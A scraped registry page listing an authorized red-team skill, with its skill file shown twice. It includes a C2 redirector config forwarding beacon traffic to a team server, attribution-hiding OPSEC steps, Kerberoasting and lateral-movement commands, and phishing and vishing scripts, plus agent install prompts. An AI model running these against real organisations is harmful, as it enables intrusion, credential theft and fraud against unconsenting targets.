1. **Team Server** — Never directly exposed to internet; VPN access only 2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic 3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive) 4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert
**Redirector Setup (Apache mod_rewrite):** ```apache # Redirect only Cobalt Strike beacon traffic to team server # Everything else → sends to legitimate domain (blend in) RewriteEngine On RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows NT 6.1; WOW64\) AppleWebKit.*" RewriteCond %{REQUEST_URI} "^/jquery-3\.3\.1\.min\.js$" RewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L] RewriteRule ^(.*)$ https://microsoft.com/ [R=302,L] # Decoy redirect ```
**Malleable C2 Profile Considerations:** - Mimic legitimate application traffic (CDN requests, Office updates, etc.) - Match real User-Agent strings from target environment - Use appropriate HTTP headers (Host, Accept-Language, etc.) - Set sleep/jitter to blend with normal traffic intervals
**OPSEC Checklist:** ``` Infrastructure OPSEC: [ ] Team server not directly accessible from internet [ ] All redirectors provisioned from different providers than each other [ ] Domain registered with privacy protection [ ] Domain aged ≥30 days before operation [ ] TLS certificate from legitimate CA (not self-signed) [ ] Kill dates set on all implants [ ] Logging enabled on team server for post-engagement review
Operational OPSEC: [ ] VPN/Tor for infrastructure access (not home IP) [ ] Separate browser profile for research vs. operation [ ] No real name/email in domain registration [ ] Payment via anonymous method where legally permitted [ ] Implant config: sandbox detection, sleep with jitter [ ] All C2 traffic encrypted and indistinguishable from HTTPS ```
### 3. Active Directory Attack Methodology
**When the user asks about AD attack paths for authorized engagements:**
**BloodHound Analysis Workflow:** ```bash # Collection (run on domain-joined host in scope) # PowerShell-based (noisier but complete) Import-Module SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp\
# C# executable (quieter) SharpHound.exe -c All --outputdirectory C:\temp\
# Upload ZIP to BloodHound UI and analyze: # Queries to run: # - Find Shortest Paths to Domain Admins # - Find Principals with DCSync Rights # - Find Computers with Unsupported Operating Systems # - Find AS-REP Roastable Users ```
**Key AD Attack Techniques (authorized):**
| Technique | ATT&CK ID | Tool | Description | |-----------|-----------|------|-------------| | Kerberoasting | T1558.003 | Rubeus, Impacket | Request TGS for SPNs → crack offline | | AS-REP Roasting | T1558.004 | Rubeus, GetNPUsers.py | Users with no pre-auth required | | Pass-the-Hash | T1550.002 | Impacket, CrackMapExec | Use NTLM hash without cracking | | Pass-the-Ticket | T1550.003 | Rubeus | Use Kerberos ticket for auth | | Overpass-the-Hash | T1550.003 | Rubeus | Convert NTLM hash to TGT | | DCSync | T1003.006 | Mimikatz, Impacket | Replicate domain hashes | | Golden Ticket | T1558.001 | Mimikatz | Forge TGT with KRBTGT hash | | Silver Ticket | T1558.002 | Mimikatz | Forge TGS for specific service |
**Kerberoasting (authorized use):** ```bash # Using Impacket (Linux → Windows domain) GetUserSPNs.py -dc-ip 192.168.1.10 domain.local/user:password -request
# Using Rubeus (on Windows, in scope) Rubeus.exe kerberoast /outfile:hashes.txt
# Crack with hashcat hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt ```
**Lateral Movement Options:** ```bash # PsExec style (via Impacket) psexec.py domain.local/admin:password@192.168.1.20
# WMI execution wmiexec.py domain.local/admin:password@192.168.1.20
# SMB with NetExec nxc smb 192.168.1.0/24 -u admin -p 'password' --shares
# RDP (if authorized) rdesktop -u admin -p password 192.168.1.20 ```
### 4. Social Engineering (Authorized Campaigns)
**When the user asks to plan an authorized social engineering exercise:**
**Phishing Campaign Framework:**
1. **Scope confirmation** — What targets are authorized? What is prohibited? 2. **Pretext development** — What scenario is believable for this organization? - IT help desk password reset - Finance: invoice / payment confirmation - HR: benefits enrollment - Executive: board communication 3. **Infrastructure setup** — Phishing domain, email server, landing page 4. **Landing page** — Credential harvester or payload delivery 5. **Tracking** — Click tracking, credential capture, payload execution 6. **Reporting metrics** — Click rate, credential submission rate, report rate
**Pretext Template (for authorized campaigns):** ``` Subject: Action Required: IT Security Policy Update — Password Reset Required
From: IT Help Desk <helpdesk@[spoofed-or-lookalike-domain]>
Dear [Name],
As part of our ongoing security improvements, all employees must update their passwords by [date]. Please click the link below to verify your identity and reset your password:
[Phishing Link]
If you did not receive this email or have questions, contact the IT Help Desk at x4444.
Regards, IT Security Team [Company Name]
--- [Include realistic footer with physical address, unsubscribe link for legitimacy] ```
**Vishing Script Template:** ``` Caller: "Hi, this is [Name] from IT Security. We've detected some unusual activity on your account. I need to verify your identity. Can I get your employee ID and the last four digits of your SSN?..." ```
### 5. Red Team Reporting
**When the user asks to create a red team report:**
```markdown # Red Team Assessment Report **CLIENT CONFIDENTIAL**
**Organization:** [Client Name] **Assessment Type:** [Red Team / APT Simulation] **Assessment Period:** [Date] to [Date] **Report Date:** [Date] **Report Classification:** Client Confidential
---
## Executive Summary [2-3 paragraphs: what was tested, what was found at high level, key recommendations. Written for non-technical executives.]
**Overall Risk Rating:** [Critical / High / Medium / Low]
**Key Findings:** 1. Initial access achieved via [vector] within [timeframe] 2. Domain Admin achieved via [technique] after [timeframe] 3. Detection gap: [N] hours from initial access to detection 4. [N] objectives achieved out of [N] defined
---
## Attack Timeline | Phase | Time | Action | Detection? | |-------|------|--------|-----------| |
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for Red Team Operations & Engagement Planning, ready for a manual X post.
Red Team Operations & Engagement Planning: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral... 397 stars https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x
Listing + install path for Red Team Operations & Engagement Planning: https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x Install: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operatio...
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to Masriyan but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/audit)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)Masriyan
@masriyan
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Do not auto-install
Frontend Design
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
174.2K StarsTaste Skill: Anti-Slop Frontend
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
84.4K StarsCanvas Design
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
174.2K StarsAnthropic Brand Guidelines
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
174.2K StarsDo not auto-install
Install targets
Codex install prompt
Install the "Red Team Operations & Engagement Planning" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"masriyan-red-team-operations-engagement-planning","task":"Install Red Team Operations & Engagement Planning","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Deep research, source comparison, literature review, RAG, knowledge search, and reports.
Scenario
Research agents
I need my agent to research a topic, compare sources, and produce a concise report.
Agent fit
Claude Code + Browser agents + CLI
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Maintenance
fresh
2d since push
Risk
Needs review
Dependency or permission surface needs review
GitHub quality
397
77/100 Quality · 66/100 Trust
Coverage tags
Review notes
Dependency or permission surface needs review · Permission surface may require sandboxing
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
StrongSolid option that is likely worth shortlisting for production workflows.
Trust
Do not auto-installTrust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Choose a stronger alternative or inspect the source manually before any install attempt.
Stars
397 GitHub stars
Repo activity
397 stars, 75 forks
Maintenance
2d since push
License
MIT
Install
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningDo not use when
Alternative
174.2K Stars
npx skills add anthropics/skills --skill frontend-design
Alternative
84.4K Stars
npx skills add Leonxlnx/taste-skill --skill design-taste-frontend
Alternative
174.2K Stars
npx skills add anthropics/skills --skill canvas-design
Alternative
174.2K Stars
npx skills add anthropics/skills --skill brand-guidelines
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill may drive a browser or interact with web pages.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
medium
Skill may read or write project files, documents, generated artifacts, or local workspace state.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
Agent should check
Copy prompt
Task: Use Red Team Operations & Engagement Planning in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install
Install command: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
LLM text format
/api/skills/masriyan-red-team-operations-engagement-planning/install?format=text
Find alternatives
/api/skills/search?q=Red%20Team%20Operations%20%26%20Engagement%20Planning&limit=3
Agent prompt
Use Red Team Operations & Engagement Planning for this task. Review https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install, then install with: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/masriyan-red-team-operations-engagement-planning
LLM text
/api/registry/manifest/masriyan-red-team-operations-engagement-planning?format=text
Install alias
/api/registry/install/masriyan-red-team-operations-engagement-planning
Recommend
/api/registry/recommend?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&limit=3
Agent fit
Research agents
Use-case tags
Platforms
Claude Code, Browser agents
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Shortlist this skill and compare it with close alternatives before production adoption.
Role in stack
Companion skill
Primary fit
Research agents
Trust label
Strong shortlist
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
GitHub adoption
INFO397 GitHub stars
Stars/forks activity
INFO397 stars, 75 forks; issue activity unavailable in current metadata
Recent maintenance
PASS2d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Choose a stronger alternative or inspect the source manually before any install attempt.
Quality profile
Solid option that is likely worth shortlisting for production workflows.
Workflow fit
Investigate faster
I need my agent to research a topic, compare sources, and produce a concise report.
Automate repeated work
I need my agent to automate a repeated workflow across tools and files.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Find, compare, and synthesize
A workflow for agents that gather sources, compare claims, summarize long material, and draft useful research briefs.
Turn skills into distribution
A workflow for turning newly indexed skills into SEO briefs, social drafts, comparison pages, and reusable publishing workflows.
Alternative shortlist
Similar skills that may fit this task.
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
--- name: Red Team Operations & Engagement Planning description: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting version: 3.0.0 author: Masriyan tags: [cybersecurity, red-team, c2, lateral-movement, persistence, pentest, engagement, opsec] ---
# Red Team Operations & Engagement Planning
## Purpose
Enable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.
> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it. > > **Authorized contexts:** > - Signed Statement of Work (SOW) or Rules of Engagement (ROE) > - Bug bounty program (confirm target is in-scope) > - Internal security testing (confirm organizational authority) > - CTF competition (confirm challenge platform and scope) > - Research in owned/isolated lab environment
---
## Activation Triggers
This skill activates when the user asks about: - Planning a red team engagement or adversary simulation - Designing C2 infrastructure (redirectors, team servers, C2 profiles) - Active Directory attack paths (BloodHound, Kerberoasting, DCSync) - Lateral movement techniques for authorized engagements - Persistence mechanisms in red team context - Social engineering campaign planning (authorized) - Red team reporting and executive presentations - Tabletop exercises (TTX) design - Purple team collaboration - OPSEC planning for authorized operations
---
## Prerequisites
```bash pip install pyyaml requests ```
**Tools for authorized operations:** - `Cobalt Strike / Sliver / Havoc` — C2 frameworks - `Metasploit` — Exploitation framework - `BloodHound / SharpHound` — AD attack path analysis - `Impacket` — Network protocol tools - `CrackMapExec / NetExec` — AD enumeration - `Responder` — LLMNR/NBT-NS poisoning - `Mimikatz` — Credential access (Windows)
---
## Authorization Verification
**Before any operational planning, Claude asks:**
``` Red team assistance requires authorization confirmation:
1. What is the engagement type? □ External penetration test □ Internal network assessment □ Red team / adversary simulation □ Social engineering assessment □ Physical security assessment □ CTF competition
2. What is your authorization basis? □ Signed SOW / contract with target organization □ Internal role (IT/Security team testing own systems) □ Bug bounty — [program name] □ CTF — [platform and challenge name]
3. What is the defined scope? (IP ranges, domains, systems, excluded assets)
4. Who is the target organization's security point of contact? (For deconfliction — required for IR-level engagements)
Confirm before proceeding. Operational assistance without confirmed authorization cannot be provided. ```
---
## Core Capabilities
### 1. Engagement Planning
**When the user asks to plan a red team engagement:**
**Engagement Planning Framework:**
```markdown # Red Team Engagement Plan **Client:** [Organization Name] **Engagement Type:** [Full Red Team / CRTO / APT Simulation] **Start Date:** [Date] **End Date:** [Date] **Rules of Engagement Version:** 1.0
## Objectives - Primary: [e.g., Test detection and response capabilities against APT29 TTPs] - Secondary: [e.g., Identify privilege escalation paths to Domain Admin] - Out of Scope: [e.g., Production databases, payment systems, physical access]
## Threat Profile **Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile] **Initial Access Vector:** [Spearphishing / Supply chain / Watering hole] **Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]
## Attack Kill Chain Phases 1. Reconnaissance → OSINT, subdomain enum (Skill 01) 2. Initial Access → Phishing / external vuln exploitation 3. Execution → PowerShell / LOLBins / custom implant 4. Persistence → Registry / service / scheduled task 5. Privilege Escalation → Local privesc → Domain Admin 6. Defense Evasion → Process injection / AMSI bypass 7. Credential Access → LSASS / Kerberoasting / DCSync 8. Lateral Movement → PSExec / WMI / RDP 9. Collection → Identify critical data 10. Exfiltration → Staged transfer to simulated C2
## Rules of Engagement - Testing hours: [24x7 / Business hours only / Agreed windows] - Destructive testing: [Prohibited / Limited / Authorized] - DoS testing: [Prohibited] - Social engineering: [Authorized / Prohibited / Phishing only] - Physical access: [Prohibited / Badge cloning only] - Deconfliction: Call [POC Name] at [Phone] if critical systems impacted
## Emergency Abort Procedure If critical systems are impacted unexpectedly: 1. Immediately cease all operations 2. Call [POC] at [Phone] — available 24/7 3. Document what was done and when 4. Stand down until authorized to resume ```
**Engagement Planning Script:** ```bash python scripts/engagement_planner.py --scope scope.json --output plan.md ```
### 2. C2 Infrastructure Design
**When the user asks about C2 infrastructure for authorized operations:**
**Multi-Tier C2 Architecture:**
``` [Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon] → [Redirector 2 (DNS)] ← → [Beacon] → [Backup Redirector] ```
**Infrastructure Components:**
1. **Team Server** — Never directly exposed to internet; VPN access only 2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic 3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive) 4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert
**Redirector Setup (Apache mod_rewrite):** ```apache # Redirect only Cobalt Strike beacon traffic to team server # Everything else → sends to legitimate domain (blend in) RewriteEngine On RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows NT 6.1; WOW64\) AppleWebKit.*" RewriteCond %{REQUEST_URI} "^/jquery-3\.3\.1\.min\.js$" RewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L] RewriteRule ^(.*)$ https://microsoft.com/ [R=302,L] # Decoy redirect ```
**Malleable C2 Profile Considerations:** - Mimic legitimate application traffic (CDN requests, Office updates, etc.) - Match real User-Agent strings from target environment - Use appropriate HTTP headers (Host, Accept-Language, etc.) - Set sleep/jitter to blend with normal traffic intervals
**OPSEC Checklist:** ``` Infrastructure OPSEC: [ ] Team server not directly accessible from internet [ ] All redirectors provisioned from different providers than each other [ ] Domain registered with privacy protection [ ] Domain aged ≥30 days before operation [ ] TLS certificate from legitimate CA (not self-signed) [ ] Kill dates set on all implants [ ] Logging enabled on team server for post-engagement review
Operational OPSEC: [ ] VPN/Tor for infrastructure access (not home IP) [ ] Separate browser profile for research vs. operation [ ] No real name/email in domain registration [ ] Payment via anonymous method where legally permitted [ ] Implant config: sandbox detection, sleep with jitter [ ] All C2 traffic encrypted and indistinguishable from HTTPS ```
### 3. Active Directory Attack Methodology
**When the user asks about AD attack paths for authorized engagements:**
**BloodHound Analysis Workflow:** ```bash # Collection (run on domain-joined host in scope) # PowerShell-based (noisier but complete) Import-Module SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp\
# C# executable (quieter) SharpHound.exe -c All --outputdirectory C:\temp\
# Upload ZIP to BloodHound UI and analyze: # Queries to run: # - Find Shortest Paths to Domain Admins # - Find Principals with DCSync Rights # - Find Computers with Unsupported Operating Systems # - Find AS-REP Roastable Users ```
**Key AD Attack Techniques (authorized):**
| Technique | ATT&CK ID | Tool | Description | |-----------|-----------|------|-------------| | Kerberoasting | T1558.003 | Rubeus, Impacket | Request TGS for SPNs → crack offline | | AS-REP Roasting | T1558.004 | Rubeus, GetNPUsers.py | Users with no pre-auth required | | Pass-the-Hash | T1550.002 | Impacket, CrackMapExec | Use NTLM hash without cracking | | Pass-the-Ticket | T1550.003 | Rubeus | Use Kerberos ticket for auth | | Overpass-the-Hash | T1550.003 | Rubeus | Convert NTLM hash to TGT | | DCSync | T1003.006 | Mimikatz, Impacket | Replicate domain hashes | | Golden Ticket | T1558.001 | Mimikatz | Forge TGT with KRBTGT hash | | Silver Ticket | T1558.002 | Mimikatz | Forge TGS for specific service |
**Kerberoasting (authorized use):** ```bash # Using Impacket (Linux → Windows domain) GetUserSPNs.py -dc-ip 192.168.1.10 domain.local/user:password -request
# Using Rubeus (on Windows, in scope) Rubeus.exe kerberoast /outfile:hashes.txt
# Crack with hashcat hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt ```
**Lateral Movement Options:** ```bash # PsExec style (via Impacket) psexec.py domain.local/admin:password@192.168.1.20
# WMI execution wmiexec.py domain.local/admin:password@192.168.1.20
# SMB with NetExec nxc smb 192.168.1.0/24 -u admin -p 'password' --shares
# RDP (if authorized) rdesktop -u admin -p password 192.168.1.20 ```
### 4. Social Engineering (Authorized Campaigns)
**When the user asks to plan an authorized social engineering exercise:**
**Phishing Campaign Framework:**
1. **Scope confirmation** — What targets are authorized? What is prohibited? 2. **Pretext development** — What scenario is believable for this organization? - IT help desk password reset - Finance: invoice / payment confirmation - HR: benefits enrollment - Executive: board communication 3. **Infrastructure setup** — Phishing domain, email server, landing page 4. **Landing page** — Credential harvester or payload delivery 5. **Tracking** — Click tracking, credential capture, payload execution 6. **Reporting metrics** — Click rate, credential submission rate, report rate
**Pretext Template (for authorized campaigns):** ``` Subject: Action Required: IT Security Policy Update — Password Reset Required
From: IT Help Desk <helpdesk@[spoofed-or-lookalike-domain]>
Dear [Name],
As part of our ongoing security improvements, all employees must update their passwords by [date]. Please click the link below to verify your identity and reset your password:
[Phishing Link]
If you did not receive this email or have questions, contact the IT Help Desk at x4444.
Regards, IT Security Team [Company Name]
--- [Include realistic footer with physical address, unsubscribe link for legitimacy] ```
**Vishing Script Template:** ``` Caller: "Hi, this is [Name] from IT Security. We've detected some unusual activity on your account. I need to verify your identity. Can I get your employee ID and the last four digits of your SSN?..." ```
### 5. Red Team Reporting
**When the user asks to create a red team report:**
```markdown # Red Team Assessment Report **CLIENT CONFIDENTIAL**
**Organization:** [Client Name] **Assessment Type:** [Red Team / APT Simulation] **Assessment Period:** [Date] to [Date] **Report Date:** [Date] **Report Classification:** Client Confidential
---
## Executive Summary [2-3 paragraphs: what was tested, what was found at high level, key recommendations. Written for non-technical executives.]
**Overall Risk Rating:** [Critical / High / Medium / Low]
**Key Findings:** 1. Initial access achieved via [vector] within [timeframe] 2. Domain Admin achieved via [technique] after [timeframe] 3. Detection gap: [N] hours from initial access to detection 4. [N] objectives achieved out of [N] defined
---
## Attack Timeline | Phase | Time | Action | Detection? | |-------|------|--------|-----------| |
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for Red Team Operations & Engagement Planning, ready for a manual X post.
Red Team Operations & Engagement Planning: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral... 397 stars https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x
Listing + install path for Red Team Operations & Engagement Planning: https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x Install: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operatio...
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to Masriyan but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/audit)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)Masriyan
@masriyan
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Do not auto-install
Frontend Design
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
174.2K StarsTaste Skill: Anti-Slop Frontend
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
84.4K StarsCanvas Design
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
174.2K StarsAnthropic Brand Guidelines
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
174.2K StarsDo not auto-install
Install targets
Codex install prompt
Install the "Red Team Operations & Engagement Planning" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"masriyan-red-team-operations-engagement-planning","task":"Install Red Team Operations & Engagement Planning","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Deep research, source comparison, literature review, RAG, knowledge search, and reports.
Scenario
Research agents
I need my agent to research a topic, compare sources, and produce a concise report.
Agent fit
Claude Code + Browser agents + CLI
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Maintenance
fresh
2d since push
Risk
Needs review
Dependency or permission surface needs review
GitHub quality
397
77/100 Quality · 66/100 Trust
Coverage tags
Review notes
Dependency or permission surface needs review · Permission surface may require sandboxing
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
StrongSolid option that is likely worth shortlisting for production workflows.
Trust
Do not auto-installTrust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Choose a stronger alternative or inspect the source manually before any install attempt.
Stars
397 GitHub stars
Repo activity
397 stars, 75 forks
Maintenance
2d since push
License
MIT
Install
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningDo not use when
Alternative
174.2K Stars
npx skills add anthropics/skills --skill frontend-design
Alternative
84.4K Stars
npx skills add Leonxlnx/taste-skill --skill design-taste-frontend
Alternative
174.2K Stars
npx skills add anthropics/skills --skill canvas-design
Alternative
174.2K Stars
npx skills add anthropics/skills --skill brand-guidelines
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill may drive a browser or interact with web pages.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
medium
Skill may read or write project files, documents, generated artifacts, or local workspace state.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
Agent should check
Copy prompt
Task: Use Red Team Operations & Engagement Planning in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install
Install command: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
LLM text format
